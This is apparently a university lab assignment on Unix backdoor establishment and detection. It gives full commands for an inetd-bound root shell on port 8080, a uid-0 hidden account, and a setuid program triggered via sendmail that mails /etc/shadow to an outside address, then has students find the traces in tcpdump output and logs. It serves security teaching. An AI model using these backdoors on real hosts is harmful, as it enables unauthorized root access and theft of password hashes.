Assignments of day 2 in week #3

Backdoor establishment and detection

1. Interactive access
   • By inetd
     1. Create a /tmp/any_name_you_like file with the following line

         8080  stream tcp nowait root /bin/sh sh -i 

     2. Start second instance of inet by

         /usr/sbin/inetd /tmp/any_name_you_like 

     3. tcpdump on 8080 port

         tcpdump -s 2000 -w backdoor.dump port 8080 

     4. ssh to your partner host and login as a general user. Then telnet back to your host in 8080 port

         telnet your_host 8080

        Type "whoami" and "hostname" command to confirm your root shell access after telneting your host at 8080 port. Type some commands too in the root shell, says "cat /etc/shadow"

     5. At your host, kill the inetd and restart the normal inetd

         killall inetd
        /etc/rc.d/init.d/inet start
        

     6. Stop the tcpdump in step 3 and exam the tcpdump file. Idtentify the commands that you have typed after your get the root shell at your host and compare them with what you found in the /root/.bash_history file.

     Post all your findings on your web pages

   • By 0 uid account
     1. create a 0 uid and 0 gid account at your host

        adduser -u 0 -g 0 nulluser
        passwd nulluser
        Changing password for user nulluser
        New UNIX password: 
        Retype new UNIX password: 
        passwd: all authentication tokens updated successfully
        

     2. login your host by this nulluser account

         ssh your_host -l nulluser 

     3. Type "whoami" to confirm your root access after you login the nulluser account. Type some other commands too in this account login, says "cat /etc/shadow"

     4. What do you find in /home/nulluser/.bash_history and /root/.bash_history file?

     Post all your findings on your web pages

2. Non-inteactive access
   • By e-mail
     1. Edit a sendpass.c file with the following lines:

        main()
        { system("/bin/mail -s passwd your_email_address < /etc/shadow");}
        

     2. Compile it with the output to /etc/sendpass and set it to suid

        gcc -o /etc/sendpass sendpass.c 
        chmod +s /etc/sendpass
        

     3. soft link this file in /etc/smrsh directory

        ln -s /etc/sendpass /etc/smrsh/sendpass

     4. update the /etc/sendmail.ct with the nulluser account

        echo nulluser >> /etc/sendmail.ct 

     5. edit the ~nulluser/.forward file as follows:

        "|/etc/sendpass"

     6. ssh your partner host and send an e-mail to nulluser@yourhost

        mail nulluser@your_host.vmx.hkntec.net

     7. Check if you receive your host /etc/shadow information by mail

     8. What do you find in /var/log/maillog ?

     Post all your findings on your web pages

References:

• Read the man page of the above commands
• Backdoor Management

• Sendmail features